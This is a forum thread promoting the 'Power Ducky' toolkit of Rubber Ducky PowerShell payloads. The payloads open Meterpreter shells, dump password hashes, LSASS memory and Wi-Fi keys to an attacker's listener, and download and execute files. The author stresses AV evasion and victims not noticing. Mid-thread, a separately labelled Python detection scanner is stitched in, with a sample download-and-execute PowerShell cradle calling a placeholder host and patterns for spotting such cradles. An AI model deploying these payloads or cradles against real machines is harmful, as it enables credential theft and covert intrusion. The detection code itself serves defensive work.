
Power Ducky ToolKit


b00stfr3ak

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also, if anyone wants to add to the script, it should be pretty easy; all the files are separated for re-usability.

PowerShell Scripts for the Hak5 Ducky

1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit

All payloads are written in PowerShell, so nothing should be caught by AV.

https://github.com/b00stfr3ak/power-ducky

Fast Meterpreter
Stores the meterpreter script on a web server; the ducky will then go grab the script using SSL and execute it on the victim's machine.

Reverse Meterpreter
Creates a reverse meterpreter shell through PowerShell injection.

Dump Domain and Local Hashes
Makes a copy of the sam and sys files, and then dumps those files through a TCP socket to a listening server.

Dump Lsass Process
Dumps the lsass process through PowerShell, then reads the file and dumps it through a TCP socket to a listening server.

Dump Wifi Passwords
Dumps all available wifi profiles, and then dumps each file through a TCP socket.

Wget Execute
Downloads a file and executes it on the victim's machine.


The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker, all encrypted. It does take a while with larger files; however, it does work, and it happens in the background on the victim computer so they won't notice. Once the correct reg files are downloaded, the script will print the hashes to the screen and write them to a file.


Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server, and then all the ducky has to do is download that script through SSL and execute it. The beauty of this script is that it is 10 lines long and the actual PowerShell command is less than 200 characters.

Ideas from:

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

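The payloads described in this thread share one pattern: a short PowerShell command fetches a script over HTTPS and runs it in memory instead of dropping a binary. On the defender's side, that pattern is what to hunt for in process-creation telemetry. The scanner below is an added example and is not part of this thread or of the power-ducky project; the log records, indicator list and weights are constructed for illustration, and the decoding of -EncodedCommand follows the documented UTF-16LE base64 convention.

```python
import base64
import re

# Indicators of "fetch a script and run it in memory", as (name, regex, weight); weights are a heuristic.
INDICATORS = [
    ("download_cradle", r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", 3),
    ("in_memory_exec", r"\bIEX\b|Invoke-Expression", 3),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("policy_bypass", r"-e(?:xec|xecutionpolicy|p)\s+bypass", 1),
]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)  # base64 of UTF-16LE text

# Constructed sample process-creation records (parent image, command line); not real telemetry.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"
    .encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe -NoP -W Hidden -Exec Bypass -C \"IEX (New-Object "
                     "Net.WebClient).DownloadString('https://example.invalid/stage.ps1')\""),
    ("cmd.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\nightly-backup.ps1"),
    ("explorer.exe", "powershell.exe -enc " + ENCODED_SAMPLE),
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script if the command line carries one, else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(parent, cmdline):
    """Score one record; the decoded payload is scanned too, so encoding alone hides nothing."""
    text, hits, score = cmdline, [], 0
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        text, hits, score = cmdline + " " + decoded, ["encoded_command"], 2
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            hits.append(name)
            score += weight
    return score, hits

def triage(events, threshold=6):
    """Return (parent, cmdline, score, hits) for PowerShell launches scoring at or above threshold."""
    flagged = []
    for parent, cmdline in events:
        if re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I):
            score, hits = score_event(parent, cmdline)
            if score >= threshold:
                flagged.append((parent, cmdline, score, hits))
    return flagged
```

The scripted backup launched with only an execution-policy bypass stays below the threshold, while both the plain and the base64-encoded download-and-execute records are flagged with the indicators that fired.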

Has anyone tried this?

It looks good b00stfr3ak, please keep up the great work.

I would try it but I'm away for a few days.

When I get back and try it, I'll give some feedback as best I can.

I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it.


Have you tried implementing Invoke-Mimikatz from PowerSploit?

This could be implemented. I would just need to ask if I could use his script.

Also, how does the dump domain hashes work? I thought you could only dump domain hashes from the NTDS.DIT file.

If a computer is on the domain, by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller.


Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things), which Darren covers in one of the Hak5 videos. If that's the case, I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that it's possible to "6) Wget Execute".

Sounds excellent; that's exactly one of the things I want my Ducky to be able to do. However, in looking at the documentation, I'm not sure how to go about tailoring the source code so that it downloads the particular file I want from the particular source website, as it appears your source code is written in Ruby.

Please help!



It would be a good idea to create some videos on this; I just haven't had time. Can you clone the newest repo? This should get rid of the hex option (it was broken and took too much time). The best option to try is Fast Meterpreter. It is the fastest command and gives an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK, but then you have to worry about dropping a binary file and not getting caught by AV.


Possible to allow the script to set 'host ip' to a hostname as well?

Does the script fail with DNS names? It should just pass everything to Metasploit. I'll take a look tonight. I plan on re-writing the tool, because the code looks so bad.


Is it possible to have a sub-menu option to set the Meterpreter IPs on the fly (as I use a multi-hop VPN and my Metasploit IP can change)? Also, add an option to drop a file to load a new Meterpreter into memory at boot up.


Hello b00stfr3ak

Powerducky is a great tool; however, the latest version checked into GitHub has some issues.

It seems there was some syntax issue in the main menu, and the payload to add a user to the admin group fails, since the word localadmin is misspelled.

For the reverse shell attack I am able to make it work from the Rubber Ducky: the payload is injected and I get a message on my attacking machine (sending stage to victim xx bytes), but it hangs there. I tried to use the x64 meterpreter (since my victim machine uses an x64 architecture), but PowerShell just dies on the victim machine. It seems the payload needs to be specific for an x64 victim, and your payload on GitHub is specific to 32 bits. Do you have a reverse shell payload for x64? Thank you.


Thanks, I fixed the add-admin syntax and it has been pushed to GitHub.

What are the syntax issues with the main menu?

x32 works on an x64 OS. It might have been a network issue, because the PowerShell code did reach the Metasploit server. I'm thinking about adding the option to not use a stager, but I'll have to do that later.

For any issues, can you post them to GitHub so I can keep track of them? Thanks!

How do I set this up to work in the Ducky?
